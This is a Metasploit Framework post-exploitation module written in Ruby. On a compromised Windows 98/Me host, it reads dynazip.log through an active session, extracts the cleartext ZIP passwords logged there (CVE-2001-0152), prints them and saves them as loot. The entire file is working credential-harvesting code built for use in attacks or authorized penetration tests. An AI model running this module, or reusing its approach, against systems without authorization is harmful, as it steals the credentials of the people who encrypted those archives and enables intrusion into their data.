GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/dynazip_log.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
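class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Auxiliary::Report

  # Header DynaZIP writes at the start of every diagnostic entry; the log is
  # split on it so each ZIP operation can be parsed independently.
  LOG_ENTRY_SEPARATOR = '- DynaZIP ZIP Diagnostic Log -'.freeze

  # Line holding the path of the archive that was created. The path itself is
  # on the following line, hence the multi-line anchor.
  ZIP_FILE_RE = /^lpszZIPFile: 0x[0-9a-f]+\s*?^(.+)\r\n/

  # The lpszEncryptCode value appears to always be 0x712185d4, but a generic
  # hex pattern is used just in case. The line following it holds the password
  # (or an empty line when no password was chosen).
  ENCRYPT_CODE_RE = /^lpszEncryptCode: 0x[0-9a-f]+\s*?^(.+)?\r\n/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather DynaZIP Saved Password Extraction',
        'Description' => %q{
          This module extracts clear text credentials from dynazip.log.
          The log file contains passwords used to encrypt compressed zip
          files in Microsoft Plus! 98 and Windows Me.
        },
        'License' => MSF_LICENSE,
        'Author' => ['bcoles'],
        'References' => [
          ['CVE', '2001-0152'],
          ['MSB', 'MS01-019'],
          ['PACKETSTORM', '24543'],
          ['URL', 'https://support.microsoft.com/en-us/kb/265131']
        ],
        'DisclosureDate' => '2001-03-27',
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter', 'shell']
      )
    )
  end

  # Locates %WINDIR%\dynazip.log on the target, extracts every
  # (zip path, password) pair it contains, prints them as a table and stores
  # the table as loot so the recovered credentials outlive the session.
  #
  # Returns early (with print_error) when %WINDIR% cannot be resolved, the log
  # is missing or empty, or no passwords were found.
  def run
    # get_env may return nil/empty on a broken shell; without this guard the
    # path would degrade to "\dynazip.log" and the error message would mislead.
    windir = get_env('%WINDIR%')
    if windir.to_s.empty?
      print_error('Unable to resolve %WINDIR% on the target')
      return
    end

    log_path = "#{windir}\\dynazip.log"

    unless file?(log_path)
      print_error("#{log_path} not found")
      return
    end

    print_good("Found DynaZip log file: #{log_path}")

    begin
      log_data = read_file(log_path)
    rescue EOFError
      print_error('Log file is empty')
      return
    end

    # Some session types return an empty string rather than raising EOFError.
    if log_data.to_s.empty?
      print_error('Log file is empty')
      return
    end

    # bytesize, not length: the log may be read as a multibyte string.
    vprint_status("Processing log file (#{log_data.bytesize} bytes)")

    creds = parse_log(log_data)

    if creds.empty?
      print_error('No passwords were found in the log file')
      return
    end

    table = Rex::Text::Table.new(
      'Header' => 'ZIP Passwords',
      'Indent' => 0,
      'SortIndex' => 0,
      'Columns' => ['File Path', 'Password']
    )
    creds.each { |c| table << c }
    print_line
    print_line(table.to_s)

    # Msf::Auxiliary::Report is mixed in so the findings can be persisted;
    # without this the passwords only ever lived in the console output.
    loot_path = store_loot(
      'dynazip.passwords',
      'text/plain',
      session,
      table.to_s,
      'dynazip_passwords.txt',
      'DynaZIP ZIP file passwords'
    )
    print_good("ZIP passwords saved to: #{loot_path}")
  end

  private

  # Parses the raw contents of dynazip.log.
  #
  # @param log_data [String] full contents of the log file
  # @return [Array<Array(String, String)>] one [zip_path, password] pair per
  #   log entry that recorded a non-empty password
  def parse_log(log_data)
    log_data.split(LOG_ENTRY_SEPARATOR).each_with_object([]) do |entry, creds|
      next unless entry =~ ZIP_FILE_RE

      zip_path = ::Regexp.last_match(1)
      vprint_status("Processing log entry for #{zip_path}")

      passwd = entry.scan(ENCRYPT_CODE_RE).flatten.first

      # A blank encryption password means the ZIP was not encrypted, but
      # DynaZIP still writes an empty line to the log, so the capture is nil/''.
      if passwd.to_s.empty?
        vprint_status('Did not find a password')
        next
      end

      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
      creds << [zip_path, passwd]
    end
  end
end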